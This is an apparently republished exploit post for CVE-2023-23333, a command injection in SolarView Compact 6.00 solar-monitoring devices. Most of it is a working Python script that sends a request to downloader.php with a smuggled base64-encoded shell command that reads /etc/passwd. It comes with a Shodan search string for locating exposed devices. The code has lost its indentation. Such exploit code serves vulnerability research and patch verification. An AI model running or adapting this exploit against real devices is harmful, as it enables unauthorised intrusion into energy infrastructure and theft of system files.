Exploit/Advisories no image

Published on March 15th, 2024 📆 | 4289 Views ⚑

0

SolarView Compact 6.00 Command Injection – Torchsec


https://www.ispeech.org

#- Exploit Title: SolarView Compact 6.00 - Command Injection
#- Shodan Dork: http.html:"solarview compact"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: 6.00
#- Tested on: 6.00
#- CVE : CVE-2023-23333

import argparse
import requests

def vuln_check(ip_address, port):
url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
response = requests.get(url)
if response.status_code == 200:
output = response.text
if "root" in output:
print("Vulnerability detected: Command Injection possible.")
print(f"passwd file content:\n{response.text}")

else:
print("No vulnerability detected.")
else:
print("Error: Unable to fetch response.")





def main():
parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
args = parser.parse_args()

ip_address = args.ip
port = args.port
vuln_check(ip_address, port)

if __name__ == "__main__":
main()

Source link

Tagged with:



Comments are closed.